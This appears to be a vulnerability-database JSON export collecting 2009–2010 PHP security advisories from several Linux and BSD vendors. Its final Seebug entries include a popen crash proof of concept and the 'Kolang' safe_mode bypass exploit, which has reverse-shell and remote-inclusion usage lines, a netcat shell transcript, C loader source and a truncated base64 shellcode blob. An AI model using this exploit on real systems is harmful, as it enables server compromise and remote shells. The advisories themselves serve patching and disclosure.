You can obtain the\r\n GPG public key of the Mandriva Security Team by executing:\r\n\r\n gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98\r\n\r\n You can view other update advisories for Mandriva Linux at:\r\n\r\n http://www.mandriva.com/security/advisories\r\n\r\n If you want to report vulnerabilities, please contact\r\n\r\n security_(at)_mandriva.com\r\n _______________________________________________________________________\r\n\r\n Type Bits/KeyID Date User ID\r\n pub 1024D/22458A98 2000-07-10 Mandriva Security Team\r\n <security*mandriva.com>\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.9 (GNU/Linux)\r\n\r\niD8DBQFKvPNGmqjQ0CJFipgRAjbJAJ0SV+VlWt41Ne7Zk9zYP2gR9bLkOgCggoJr\r\nFZ9YGT2ZplNudvKNgYo0c0k=\r\n=eYIU\r\n-----END PGP SIGNATURE-----", "edition": 1, "modified": "2009-09-28T00:00:00", "published": "2009-09-28T00:00:00", "id": "SECURITYVULNS:DOC:22520", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:22520", "title": "[ MDVSA-2009:248 ] php", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:09:34", "bulletinFamily": "software", "cvelist": ["CVE-2009-3558", "CVE-2009-3559", "CVE-2009-3557"], "description": "safe_mode bypass via different functions.", "edition": 1, "modified": "2009-12-04T00:00:00", "published": "2009-12-04T00:00:00", "id": "SECURITYVULNS:VULN:10417", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:10417", "title": "PHP multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:09:34", "bulletinFamily": "software", "cvelist": ["CVE-2009-3546", "CVE-2009-3292", "CVE-2009-3291", "CVE-2009-3293"], "description": "Certificates spoofing, memory corruptions on images parsing, information leakage.", "edition": 1, "modified": "2009-10-20T00:00:00", "published": "2009-10-20T00:00:00", "id": 
"SECURITYVULNS:VULN:10269", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:10269", "title": "PHP multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:35", "bulletinFamily": "software", "cvelist": ["CVE-2009-3558", "CVE-2009-4142", "CVE-2009-4143", "CVE-2009-3557"], "description": "safe_mode bypass, open_basedir bypass, memory corruption.", "edition": 1, "modified": "2010-01-08T00:00:00", "published": "2010-01-08T00:00:00", "id": "SECURITYVULNS:VULN:10505", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:10505", "title": "PHP multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "freebsd": [{"lastseen": "2019-05-29T18:34:10", "bulletinFamily": "unix", "cvelist": ["CVE-2009-3558", "CVE-2009-4142", "CVE-2009-4017", "CVE-2009-4143", "CVE-2009-3557"], "description": "\nPHP developers reports:\n\nThis release focuses on improving the stability of the\n\t PHP 5.2.x branch with over 60 bug fixes, some of which\n\t are security related. All users of PHP 5.2 are encouraged\n\t to upgrade to this release.\nSecurity Enhancements and Fixes in PHP 5.2.12:\n\nFixed a safe_mode bypass in tempnam() identified by\n\t Grzegorz Stachowiak. (CVE-2009-3557, Rasmus)\nFixed a open_basedir bypass in posix_mkfifo()\n\t identified by Grzegorz Stachowiak. (CVE-2009-3558, Rasmus)\nAdded \"max_file_uploads\" INI directive, which can\n\t be set to limit the number of file uploads per-request\n\t to 20 by default, to prevent possible DOS via temporary\n\t file exhaustion, identified by Bogdan Calin.\n\t (CVE-2009-4017, Ilia)\nAdded protection for $_SESSION from interrupt\n\t corruption and improved \"session.save_path\" check,\n\t identified by Stefan Esser. 
(CVE-2009-4143, Stas)\nFixed bug #49785 (insufficient input string\n\t validation of htmlspecialchars()). (CVE-2009-4142,\n\t Moriyoshi, hello at iwamot dot com)\n\n\n", "edition": 4, "modified": "2009-12-17T00:00:00", "published": "2009-12-17T00:00:00", "id": "39A25A63-EB5C-11DE-B650-00215C6A37BB", "href": "https://vuxml.freebsd.org/freebsd/39a25a63-eb5c-11de-b650-00215c6a37bb.html", "title": "php -- multiple vulnerabilities", "type": "freebsd", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:11", "bulletinFamily": "unix", "cvelist": ["CVE-2009-3292", "CVE-2009-3291", "CVE-2009-3293"], "description": "\nVendor reports\n\nSecurity Enhancements and Fixes in PHP 5.2.11:\n\t Fixed certificate validation inside\n\t php_openssl_apply_verification_policy.\n\t Fixed sanity check for the color index in imagecolortransparent.\n\t Added missing sanity checks around exif processing.\n\t Fixed bug 44683 popen crashes when an invalid mode is passed.\n\n", "edition": 4, "modified": "2009-09-17T00:00:00", "published": "2009-09-17T00:00:00", "id": "437A68CF-B752-11DE-B6EB-00E0815B8DA8", "href": "https://vuxml.freebsd.org/freebsd/437a68cf-b752-11de-b6eb-00e0815b8da8.html", "title": "php5 -- Multiple security issues", "type": "freebsd", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "slackware": [{"lastseen": "2020-10-25T16:36:25", "bulletinFamily": "unix", "cvelist": ["CVE-2009-3557", "CVE-2009-3558", "CVE-2009-4017", "CVE-2009-4142", "CVE-2009-4143"], "description": "New php packages are available for Slackware 11.0, 12.0, 12.1, 12.2, 13.0,\nand -current to fix security issues.\n\nMore details about this issue may be found in the Common\nVulnerabilities and Exposures (CVE) database:\n\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3557\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3558\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4017\n 
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4142\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4143\n\n\nHere are the details from the Slackware 13.0 ChangeLog:\n\npatches/packages/php-5.2.12-i486-1_slack13.0.txz: Upgraded.\n This fixes many bugs, including a few security issues.\n For more information, see:\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3557\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3558\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4017\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4142\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4143\n (* Security fix *)\n\nWhere to find the new packages:\n\nHINT: Getting slow download speeds from ftp.slackware.com?\nGive slackware.osuosl.org a try. This is another primary FTP site\nfor Slackware that can be considerably faster than downloading\ndirectly from ftp.slackware.com.\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating additional FTP and rsync hosting\nto the Slackware project! 
:-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated package for Slackware 11.0 (extra):\nftp://ftp.slackware.com/pub/slackware/slackware-11.0/extra/php5/php-5.2.12-i486-1_slack11.0.tgz\n\nUpdated package for Slackware 12.0:\nftp://ftp.slackware.com/pub/slackware/slackware-12.0/patches/packages/php-5.2.12-i486-1_slack12.0.tgz\n\nUpdated package for Slackware 12.1:\nftp://ftp.slackware.com/pub/slackware/slackware-12.1/patches/packages/php-5.2.12-i486-1_slack12.1.tgz\n\nUpdated package for Slackware 12.2:\nftp://ftp.slackware.com/pub/slackware/slackware-12.2/patches/packages/php-5.2.12-i486-1_slack12.2.tgz\n\nUpdated package for Slackware 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/php-5.2.12-i486-1_slack13.0.txz\n\nUpdated package for Slackware x86_64 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/php-5.2.12-x86_64-1_slack13.0.txz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/php-5.2.12-i486-1.txz\n\nUpdated package for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/php-5.2.12-x86_64-1.txz\n\n\nMD5 signatures:\n\nSlackware 11.0 package (extra):\n94663ecdfaf88a63d733196354cdaae3 php-5.2.12-i486-1_slack11.0.tgz\n\nSlackware 12.0 package:\n72797884f949a852b2a422bcc15beb8a php-5.2.12-i486-1_slack12.0.tgz\n\nSlackware 12.1 package:\n5ade2e37ba71a2b9f621d9b77c7b873a php-5.2.12-i486-1_slack12.1.tgz\n\nSlackware 12.2 package:\nb97340f6cc93d9ef0adbc4ce3bc64639 php-5.2.12-i486-1_slack12.2.tgz\n\nSlackware 13.0 package:\nea29f8d84a8cf9126a2262cc780a30a5 php-5.2.12-i486-1_slack13.0.txz\n\nSlackware x86_64 13.0 package:\na5429361ec7f715435a158c8d5c242e2 php-5.2.12-x86_64-1_slack13.0.txz\n\nSlackware -current package:\n53820c806115e882d2863d5c5b2ab2a6 php-5.2.12-i486-1.txz\n\nSlackware x86_64 -current 
package:\ne76bd2540de69a09166149bfa56da12c php-5.2.12-x86_64-1.txz\n\n\nInstallation instructions:\n\nUpgrade the package as root:\n > upgradepkg php-5.2.12-i486-1_slack13.0.txz", "modified": "2010-01-25T05:20:07", "published": "2010-01-25T05:20:07", "id": "SSA-2010-024-02", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2010&m=slackware-security.490297", "type": "slackware", "title": "[slackware-security] php", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-30T07:36:53", "bulletinFamily": "unix", "cvelist": ["CVE-2009-3292", "CVE-2009-3291", "CVE-2009-3293"], "description": "New php packages are available for Slackware 12.0, 12.1, 12.2, 13.0,\nand -current to fix security issues.\n\nMore details about this issue may be found in the Common\nVulnerabilities and Exposures (CVE) database:\n\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3291\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3292\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3293\n\n\nHere are the details from the Slackware 13.0 ChangeLog:\n\npatches/packages/php-5.2.11-i486-1_slack13.0.txz:\n This release fixes some possible security issues, all of which have\n "unknown impact and attack vectors".\n For more information, see:\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3291\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3292\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3293\n (* Security fix *)\n\nWhere to find the new packages:\n\nHINT: Getting slow download speeds from ftp.slackware.com?\nGive slackware.osuosl.org a try. This is another primary FTP site\nfor Slackware that can be considerably faster than downloading\ndirectly from ftp.slackware.com.\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating additional FTP and rsync hosting\nto the Slackware project! 
:-)\n\nAlso see the "Get Slack" section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated package for Slackware 12.0:\nftp://ftp.slackware.com/pub/slackware/slackware-12.0/patches/packages/php-5.2.11-i486-1_slack12.0.tgz\n\nUpdated package for Slackware 12.1:\nftp://ftp.slackware.com/pub/slackware/slackware-12.1/patches/packages/php-5.2.11-i486-1_slack12.1.tgz\n\nUpdated package for Slackware 12.2:\nftp://ftp.slackware.com/pub/slackware/slackware-12.2/patches/packages/php-5.2.11-i486-1_slack12.2.tgz\n\nUpdated package for Slackware 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/php-5.2.11-i486-1_slack13.0.txz\n\nUpdated package for Slackware x86_64 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/php-5.2.11-x86_64-1_slack13.0.txz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/php-5.2.11-i486-1.txz\n\nUpdated package for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/php-5.2.11-x86_64-1.txz\n\n\nMD5 signatures:\n\nSlackware 12.0 package:\nbc56d8e0d56197d7b0eaeee791e20307 php-5.2.11-i486-1_slack12.0.tgz\n\nSlackware 12.1 package:\n67fa37b8c23b303c3ecf3294183ed0ae php-5.2.11-i486-1_slack12.1.tgz\n\nSlackware 12.2 package:\n6e44a700f0ef0a57eecb37a033d3cd1f php-5.2.11-i486-1_slack12.2.tgz\n\nSlackware 13.0 package:\na766796b71a41b6cd783ffbf2b237a80 php-5.2.11-i486-1_slack13.0.txz\n\nSlackware x86_64 13.0 package:\nd7de1dc05f88c8b3b7cff7cec45f18de php-5.2.11-x86_64-1_slack13.0.txz\n\nSlackware -current package:\nfb6e9b0a3d8c4a3a08eea2bbe31a9c08 php-5.2.11-i486-1.txz\n\nSlackware x86_64 -current package:\nbe11f0990d29843d1f4480a75eaa4d3e php-5.2.11-x86_64-1.txz\n\n\nInstallation instructions:\n\nUpgrade the package as root:\n > upgradepkg php-5.2.11-i486-1_slack13.0.txz", "modified": "2009-10-04T00:01:56", "published": "2009-10-04T00:01:56", "id": "SSA-2009-276-02", "href": 
"http://www.slackware.com/security/viewer.php?l=slackware-security&y=2009&m=slackware-security.455164", "type": "slackware", "title": "php", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "redhat": [{"lastseen": "2019-08-13T18:46:10", "bulletinFamily": "unix", "cvelist": ["CVE-2009-2687", "CVE-2009-3291", "CVE-2009-3292", "CVE-2009-3546", "CVE-2009-4017", "CVE-2009-4142"], "description": "PHP is an HTML-embedded scripting language commonly used with the Apache\nHTTP Web server.\n\nMultiple missing input sanitization flaws were discovered in PHP's exif\nextension. A specially-crafted image file could cause the PHP interpreter\nto crash or, possibly, disclose portions of its memory when a PHP script\ntried to extract Exchangeable image file format (Exif) metadata from the\nimage file. (CVE-2009-2687, CVE-2009-3292)\n\nA missing input sanitization flaw, leading to a buffer overflow, was\ndiscovered in PHP's gd library. A specially-crafted GD image file could\ncause the PHP interpreter to crash or, possibly, execute arbitrary code\nwhen opened. (CVE-2009-3546)\n\nIt was discovered that PHP did not limit the maximum number of files that\ncan be uploaded in one request. A remote attacker could use this flaw to\ninstigate a denial of service by causing the PHP interpreter to use lots of\nsystem resources dealing with requests containing large amounts of files to\nbe uploaded. This vulnerability depends on file uploads being enabled\n(which it is, in the default PHP configuration). (CVE-2009-4017)\n\nNote: This update introduces a new configuration option, max_file_uploads,\nused for limiting the number of files that can be uploaded in one request.\nBy default, the limit is 20 files per request.\n\nIt was discovered that PHP was affected by the previously published \"null\nprefix attack\", caused by incorrect handling of NUL characters in X.509\ncertificates. 
If an attacker is able to get a carefully-crafted certificate\nsigned by a trusted Certificate Authority, the attacker could use the\ncertificate during a man-in-the-middle attack and potentially confuse PHP\ninto accepting it by mistake. (CVE-2009-3291)\n\nIt was discovered that PHP's htmlspecialchars() function did not properly\nrecognize partial multi-byte sequences for some multi-byte encodings,\nsending them to output without them being escaped. An attacker could use\nthis flaw to perform a cross-site scripting attack. (CVE-2009-4142)\n\nAll php users should upgrade to these updated packages, which contain\nbackported patches to resolve these issues. After installing the updated\npackages, the httpd daemon must be restarted for the update to take effect.", "modified": "2018-05-26T04:26:18", "published": "2010-01-13T05:00:00", "id": "RHSA-2010:0040", "href": "https://access.redhat.com/errata/RHSA-2010:0040", "type": "redhat", "title": "(RHSA-2010:0040) Moderate: php security update", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "centos": [{"lastseen": "2019-12-20T18:26:33", "bulletinFamily": "unix", "cvelist": ["CVE-2009-3546", "CVE-2009-2687", "CVE-2009-3292", "CVE-2009-4142", "CVE-2009-4017", "CVE-2009-3291"], "description": "**CentOS Errata and Security Advisory** CESA-2010:0040\n\n\nPHP is an HTML-embedded scripting language commonly used with the Apache\nHTTP Web server.\n\nMultiple missing input sanitization flaws were discovered in PHP's exif\nextension. A specially-crafted image file could cause the PHP interpreter\nto crash or, possibly, disclose portions of its memory when a PHP script\ntried to extract Exchangeable image file format (Exif) metadata from the\nimage file. (CVE-2009-2687, CVE-2009-3292)\n\nA missing input sanitization flaw, leading to a buffer overflow, was\ndiscovered in PHP's gd library. A specially-crafted GD image file could\ncause the PHP interpreter to crash or, possibly, execute arbitrary code\nwhen opened. 
(CVE-2009-3546)\n\nIt was discovered that PHP did not limit the maximum number of files that\ncan be uploaded in one request. A remote attacker could use this flaw to\ninstigate a denial of service by causing the PHP interpreter to use lots of\nsystem resources dealing with requests containing large amounts of files to\nbe uploaded. This vulnerability depends on file uploads being enabled\n(which it is, in the default PHP configuration). (CVE-2009-4017)\n\nNote: This update introduces a new configuration option, max_file_uploads,\nused for limiting the number of files that can be uploaded in one request.\nBy default, the limit is 20 files per request.\n\nIt was discovered that PHP was affected by the previously published \"null\nprefix attack\", caused by incorrect handling of NUL characters in X.509\ncertificates. If an attacker is able to get a carefully-crafted certificate\nsigned by a trusted Certificate Authority, the attacker could use the\ncertificate during a man-in-the-middle attack and potentially confuse PHP\ninto accepting it by mistake. (CVE-2009-3291)\n\nIt was discovered that PHP's htmlspecialchars() function did not properly\nrecognize partial multi-byte sequences for some multi-byte encodings,\nsending them to output without them being escaped. An attacker could use\nthis flaw to perform a cross-site scripting attack. (CVE-2009-4142)\n\nAll php users should upgrade to these updated packages, which contain\nbackported patches to resolve these issues. 
After installing the updated\npackages, the httpd daemon must be restarted for the update to take effect.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2010-January/028481.html\nhttp://lists.centos.org/pipermail/centos-announce/2010-January/028482.html\nhttp://lists.centos.org/pipermail/centos-announce/2010-January/028499.html\nhttp://lists.centos.org/pipermail/centos-announce/2010-January/028500.html\nhttp://lists.centos.org/pipermail/centos-announce/2010-January/028501.html\nhttp://lists.centos.org/pipermail/centos-announce/2010-January/028502.html\n\n**Affected packages:**\nphp\nphp-bcmath\nphp-cli\nphp-common\nphp-dba\nphp-devel\nphp-domxml\nphp-gd\nphp-imap\nphp-ldap\nphp-mbstring\nphp-mysql\nphp-ncurses\nphp-odbc\nphp-pdo\nphp-pear\nphp-pgsql\nphp-snmp\nphp-soap\nphp-xml\nphp-xmlrpc\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2010-0040.html", "edition": 4, "modified": "2010-01-15T00:11:27", "published": "2010-01-13T22:42:15", "href": "http://lists.centos.org/pipermail/centos-announce/2010-January/028481.html", "id": "CESA-2010:0040", "title": "php security update", "type": "centos", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:34:45", "bulletinFamily": "unix", "cvelist": ["CVE-2009-3546", "CVE-2009-2687", "CVE-2009-3292", "CVE-2009-4142", "CVE-2009-4017", "CVE-2009-3291"], "description": "[5.1.6-24.5]\n- add security fix for CVE-2009-4142 (#543469)\n[5.1.6-24.4]\n- build fix pdo_mysql on biarch systems (#543469)\n[5.1.6-24.3]\n- add security fixes for CVE-2009-2687, CVE-2009-3291, CVE-2009-3292,\n CVE-2009-3546 CVE-2009-4017 (#541597)\n- add build fix for mysqli on some biarch systems (#543469) ", "edition": 4, "modified": "2010-01-13T00:00:00", "published": "2010-01-13T00:00:00", "id": "ELSA-2010-0040", "href": "http://linux.oracle.com/errata/ELSA-2010-0040.html", "title": "php security update", "type": "oraclelinux", 
"cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "seebug": [{"lastseen": "2017-11-19T18:35:47", "description": "BUGTRAQ ID: 36449\r\nCVE ID: CVE-2009-3291,CVE-2009-3292,CVE-2009-3293,CVE-2009-3294\r\n\r\nPHP is a widely used general-purpose scripting language that is especially suited to Web development and can be embedded in HTML.\r\n\r\nMultiple functions in PHP versions before 5.2.11 contain security vulnerabilities that may allow a remote attacker to cause a denial of service or fully compromise the user's system.\r\n\r\n1) PHP's php_openssl_apply_verification_policy function does not perform certificate validation correctly, which may allow an attacker to carry out a spoofing attack with a forged certificate.\r\n\r\n2) The imagecolortransparent function does not correctly perform a sanity check on the color index.\r\n\r\n3) When running on certain Windows operating systems, the popen API function in TSRM/tsrm_win32.c allows an attacker to cause a denial of service via a crafted e or er string in the second argument.\n\nPHP 5.2.x\nVendor patch:\r\n\r\nPHP\r\n---\r\nThe vendor has released an upgrade patch that fixes this security issue; download it from the vendor's home page:\r\n\r\nhttp://www.php.net/releases/5_2_11.php", "published": "2009-09-23T00:00:00", "title": "PHP 5.2.11 fixes multiple security vulnerabilities", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-3291", "CVE-2009-3292", "CVE-2009-3293", "CVE-2009-3294"], "modified": 
"2009-09-23T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-12389", "id": "SSV:12389", "sourceData": "\n <?php\r\n$t1 = popen("echo hello", "e");\r\npclose($t1);\r\n$t2 = popen("echo hello", "re");\r\npclose($t2);\r\n$t3 = popen("echo hello", "er");\r\npclose($t3);\r\n?>\n ", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-12389"}, {"lastseen": "2017-11-19T18:13:54", "description": "No description provided by source.", "published": "2010-03-06T00:00:00", "title": "Kolang (proc_open PHP safe mode bypass 4.3.10 - 5.3.0)", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-4018"], "modified": "2010-03-06T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-19231", "id": "SSV:19231", "sourceData": "\n <?php\r\n/*\r\nKolang (PHP Safe mode bypass)\r\n(IHSteam priv8 for lazy penetration testers)\r\n \r\n(php 4.3.10 - 5.3.0)\r\nhttp://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-4018 (12/19/2009)\r\nhttp://www.milw0rm.com/exploits/7393 (12/09/2008)\r\n \r\n1- Kolang can be used directly in file inclusion RFI&LFI vulnerabilities (no upload required)\r\n2- Kolang can execute arbitrary shellcode (just for fans of metasploit )\r\n \r\n~~~~ How to use:)\r\n \r\nfor linux:\r\n kolang.php?os=linux&host=LHOST&port=LPORT\r\n or\r\n kolang.php?os=linux&shell=BASE64_ENCODED_SHELLCODE\r\n \r\nfor freebsd:\r\n kolang.php?os=freebsd&shell=BASE64_ENCODED_SHELLCODE\r\n \r\nfile inclusion :\r\n http://host/vul.php?path=http://attacker/kolang.txt?&os=linux&host=LHOST&port=LPORT\r\n \r\n \r\nhttp://localhost/kolang.php?host=localhost&port=2121\r\nhamid@bugtraq ~ $ nc -vv -l -p 2121\r\nlistening on [any] 2121 ...\r\nconnect to [127.0.0.1] from bugtraq [127.0.0.1] 40526\r\nid\r\nuid=65534(nobody) gid=65533(nogroup) groups=65533(nogroup)\r\n \r\n \r\nHamid Ebadi\r\nhttp://www.bugtraq.ir\r\ncontact : ebadi~bugtraq~ir\r\n \r\nKolang means pickaxe (the idea came from 
amnafzar naming convention)\r\n(Separ, Sarand, Alak, Skort)\r\n*/\r\n \r\n \r\n$port= intval($_REQUEST['port']);\r\n$host= $_REQUEST['host'];\r\n$os= $_REQUEST['os'];\r\n \r\n/*\r\n \r\n \r\n//compile : cc -o shellcode.so -fPIC -shared shellcode.c\r\n//\r\n//<?php\r\n//$data=file_get_contents('shellcode.so');\r\n//file_put_contents('shellcode_base64.txt',$data);\r\n//?>\r\n \r\n \r\n \r\n \r\n// "shellcode loader" : load and execute arbitrary shellcode from a file\r\n// Hamid Ebadi\r\n#define O_RDONLY 00 ; fcntl.h\r\n#define SHELLCODE_MAX_SIZE 1024\r\n// change kolang.php and shellcode loader if sys_get_temp_dir()!='/tmp'\r\n#define SHELLCODE_FILENAME "/tmp/.X11-IHSTEAM"\r\n \r\nvoid getuid()\r\n{\r\n unsetenv("LD_PRELOAD"); //not really necessary, we can remove it\r\n int fd;\r\n char shellcode[SHELLCODE_MAX_SIZE];\r\n char filename[]=SHELLCODE_FILENAME ;\r\n // we can also pass the shellcode in program's arguments\r\n if ((fd = open(SHELLCODE_FILENAME,O_RDONLY)) < 0) {\r\n exit(1);\r\n }\r\n if (read(fd,shellcode,SHELLCODE_MAX_SIZE) < 0){\r\n exit(1);\r\n }\r\n (*(void(*)()) shellcode)();\r\n}\r\n \r\n*/\r\n \r\nif ($_REQUEST['os']=='freebsd'){\r\n// freebsd shellcode loader 
(x86)\r\n$shellcode_loader=\r\n"
AAAA6AQAAOgEAACQAAAAAAAAAAAA\r\nAAAEAAAABAAAAEkAAAABAAAABgAAAHgFAAB4BQAArAEAAAAAAAAAAAAABAAAAAAAAABPAAAAAQAA\r\nAAYAAAAkBwAAJAcAAAwAAAAAAAAAAAAAAAQAAAAAAAAAVQAAAAEAAAACAAAAMAcAADAHAACxAAAA\r\nAAAAAAAAAAABAAAAAAAAAF0AAAABAAAAAwAAAOQXAADkBwAACAAAAAAAAAAAAAAABAAAAAAAAABj\r\nAAAAAQAAAAIAAADsFwAA7AcAAAQAAAAAAAAAAAAAAAQAAAAAAAAAbQAAAAYAAAADAAAA8BcAAPAH\r\nAACgAAAAAwAAAAAAAAAEAAAACAAAAHYAAAABAAAAAwAAAJAYAACQCAAACAAAAAAAAAAAAAAABAAA\r\nAAAAAAB9AAAAAQAAAAMAAACYGAAAmAgAAAgAAAAAAAAAAAAAAAQAAAAAAAAAhAAAAAEAAAADAAAA\r\noBgAAKAIAAAEAAAAAAAAAAAAAAAEAAAAAAAAAIkAAAABAAAAAwAAAKQYAACkCAAAPAAAAAAAAAAA\r\nAAAABAAAAAQAAACOAAAACAAAAAMAAADgGAAA4AgAABwAAAAAAAAAAAAAAAQAAAAAAAAAkwAAAAEA\r\nAAAAAAAAAAAAAOAIAABvAAAAAAAAAAAAAAABAAAAAAAAABEAAAADAAAAAAAAAAAAAABPCQAAnAAA\r\nAAAAAAAAAAAAAQAAAAAAAAABAAAAAgAAAAAAAAAAAAAAhA0AABAEAAAWAAAAMQAAAAQAAAAQAAAA\r\nCQAAAAMAAAAAAAAAAAAAAJQRAAD1AQAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAlAAAAAAAAAADAAEAAAAAAHABAAAAAAAAAwACAAAAAACwAwAAAAAAAAMAAwAAAAAAZAQAAAAA\r\nAAADAAQAAAAAAJQEAAAAAAAAAwAFAAAAAADUBAAAAAAAAAMABgAAAAAA6AQAAAAAAAADAAcAAAAA\r\nAHgFAAAAAAAAAwAIAAAAAAAkBwAAAAAAAAMACQAAAAAAMAcAAAAAAAADAAoAAAAAAOQXAAAAAAAA\r\nAwALAAAAAADsFwAAAAAAAAMADAAAAAAA8BcAAAAAAAADAA0AAAAAAJAYAAAAAAAAAwAOAAAAAACY\r\nGAAAAAAAAAMADwAAAAAAoBgAAAAAAAADABAAAAAAAKQYAAAAAAAAAwARAAAAAADgGAAAAAAAAAMA\r\nEgAAAAAAAAAAAAAAAAADABMAAAAAAAAAAAAAAAAAAwAUAAAAAAAAAAAAAAAAAAMAFQAAAAAAAAAA\r\nAAAAAAADABYAAQAAAAAAAAAAAAAABADx/yIAAAAAAAAAAAAAAAQA8f8xAAAAAAAAAAAAAAAEAPH/\r\nAQAAAAAAAAAAAAAABADx/zwAAAAAAAAAAAAAAAQA8f9HAAAAkBgAAAAAAAABAA4AVQAAAJgYAAAA\r\nAAAAAQAPAGMAAADsFwAAAAAAAAEADAB2AAAAoBgAAAAAAAABABAAgwAAAOgXAAAAAAAAAQALAIcA\r\nAADgGAAAAQAAAAEAEgCTAAAAeAUAAAAAAAACAAgAqQAAAOQYAAAYAAAAAQASALIAAADwBQAAAAAA\r\nAAIACAA8AAAAAAAAAAAAAAAEAPH/vgAAAJQYAAAAAAAAAQAOAMsAAACcGAAAAAAAAAEADwDYAAAA\r\n7BcAAAAAAAABAAwA5gAAAKAYAAAAAAAAAQAQAPIAAAD0BgAAAAAAAAIACAAIAQAAAAAAAAAAAAAE\r\nAPH/IgAAAAAAAAAAAAAABADx/zEAAAAAAAAAAAAAAAQA8f8IAQAAAAAAAAAAAAAEAPH/KQEAAAAA\r\nAAAAAAAABADx/zUBAADkFwAAAAAAAAECCwBCAQAAAAAAAAAA
